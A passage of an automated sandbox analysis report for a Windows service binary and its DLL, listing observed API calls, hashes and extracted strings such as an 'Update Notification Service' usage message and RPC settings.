                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocProcesslstrlen$ComputerName
                                                                                                                • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                                                                                • API String ID: 3702919091-996641649
                                                                                                                • Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                                                                                                • Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
                                                                                                                • Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                                                                                                • Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00
                                                                                                                APIs
                                                                                                                • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                                                                                                • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$Info
                                                                                                                • String ID:
                                                                                                                • API String ID: 1775632426-0
                                                                                                                • Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                                                                                                • Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
                                                                                                                • Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                                                                                                • Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FFBC32072EB,?,?,?,00007FFBC3203EC0,?,?,?,?,00007FFBC3203CFD), ref: 00007FFBC32071B1
                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FFBC32072EB,?,?,?,00007FFBC3203EC0,?,?,?,?,00007FFBC3203CFD), ref: 00007FFBC32071BF
                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FFBC32072EB,?,?,?,00007FFBC3203EC0,?,?,?,?,00007FFBC3203CFD), ref: 00007FFBC32071E9
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FFBC32072EB,?,?,?,00007FFBC3203EC0,?,?,?,?,00007FFBC3203CFD), ref: 00007FFBC3207257
                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FFBC32072EB,?,?,?,00007FFBC3203EC0,?,?,?,?,00007FFBC3203CFD), ref: 00007FFBC3207263
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                • String ID: api-ms-
                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                • Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                                                                                                • Instruction ID: 557b634dfabaab833202b5a774b35273f93e90df1d8c47218e0ae8bfa7347e25
                                                                                                                • Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                                                                                                • Instruction Fuzzy Hash: FD31D4B1B1A74195FE15AF26E400DBA6794BF48B60F9D0634ED5D2F390DE3CE4498300
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 2506987500-0
                                                                                                                • Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                                                                                                • Instruction ID: 2cb3988977a9158e39452ff99fdd54e8acfe6c828045fcd8ef4dd32b7d245c12
                                                                                                                • Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                                                                                                • Instruction Fuzzy Hash: 76213DB0A0C68245FE64BF31D65193B63519F447B0F9C0634E93F2EAE6DE2CA4499B00
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                • String ID: CONOUT$
                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                • Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                                                                                                • Instruction ID: d6e3fe966b1ae33d53e51d73b65c9d03710d9330b42a1facbbfcc81ee0a017a1
                                                                                                                • Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                                                                                                • Instruction Fuzzy Hash: 45118461718B41C2EB509F66E944B2AB3A0FB98FE4F484234E95D5B794CF3CD9448744
                                                                                                                APIs
                                                                                                                • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                                                                                                • CreateEventW.KERNEL32 ref: 00000001400012C0
                                                                                                                  • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                                                                                                  • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                                                                                                                  • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                                                                                                  • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                                                                                                  • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                                                                                                  • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                                                                                                  • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                                                                                                  • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                                                                                                  • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                                                                                                  • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                                                                                                  • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                                                                                                • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                                                                                                • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                                                                                                  • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                                                                                                  • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                                                                                                  • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                                                                                                  • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                                                                                                  • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                                                                                                  • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                                                                                                  • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                                                                                                                  • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                                                                                                  • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                                                                                                  • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                                                                                                  • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                                                                                                  • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                                                                                                  • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                                                                                                                  • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                                                                                                  • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                                                                                                  • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                                                                                                  • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                                                                                                • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                                                                                                • String ID: vseamps
                                                                                                                • API String ID: 3197017603-3944098904
                                                                                                                • Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                                                                                                • Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
                                                                                                                • Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                                                                                                • Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Messagesprintf_s
                                                                                                                • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                                                                                                • API String ID: 2642950106-3610746849
                                                                                                                • Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                                                                                                • Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
                                                                                                                • Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                                                                                                • Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$FreeProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 3859560861-0
                                                                                                                • Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                                                                                                • Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
                                                                                                                • Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                                                                                                • Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$FreeProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 3859560861-0
                                                                                                                • Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                                                                                                • Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
                                                                                                                • Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                                                                                                • Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200
                                                                                                                APIs
                                                                                                                • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                                                                                                • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                                                                                                • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: StringType$ByteCharMultiWide$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 319667368-0
                                                                                                                • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                                                                                                • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                                                                                                                • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                                                                                                • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                                                                                                                APIs
                                                                                                                • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                                                                                                  • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                                                                                                • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                                                                                                • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 1390108997-0
                                                                                                                • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                                                                                                • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                                                                                                                • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                                                                                                • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                • String ID: csm$csm$csm
                                                                                                                • API String ID: 3523768491-393685449
                                                                                                                • Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                                                                                                • Instruction ID: 912062a1e2a10727d625d8450e062c860dbc12f463aac3a044a03264adc94223
                                                                                                                • Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                                                                                                • Instruction Fuzzy Hash: 49E195B29087818AEF10AF74D480BBE77A1FB45B48F984135DB9D6B656CF38E489C740
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FFBC3208BC9,?,?,?,?,00007FFBC3208C14), ref: 00007FFBC32095CB
                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FFBC3208BC9,?,?,?,?,00007FFBC3208C14), ref: 00007FFBC3209601
                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FFBC3208BC9,?,?,?,?,00007FFBC3208C14), ref: 00007FFBC320962E
                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FFBC3208BC9,?,?,?,?,00007FFBC3208C14), ref: 00007FFBC320963F
                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FFBC3208BC9,?,?,?,?,00007FFBC3208C14), ref: 00007FFBC3209650
                                                                                                                • SetLastError.KERNEL32(?,?,?,00007FFBC3208BC9,?,?,?,?,00007FFBC3208C14), ref: 00007FFBC320966B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 2506987500-0
                                                                                                                • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                                                                                                • Instruction ID: ed1c50bb17997c49093f04b477dda85b111a87f84caeb1cb6af2fb04ca1e063c
                                                                                                                • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                                                                                                • Instruction Fuzzy Hash: 43113AB0A0C24245FE647F31D65193B63529F48BB0F884334E82F2E6E6DE2CA4459700
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 3326452711-0
                                                                                                                • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                                                                                                • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                                                                                                                • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                                                                                                • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                                                                                • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                                                                                                • API String ID: 2984211723-1229430080
                                                                                                                • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                                                                                                • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                                                                                                                • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
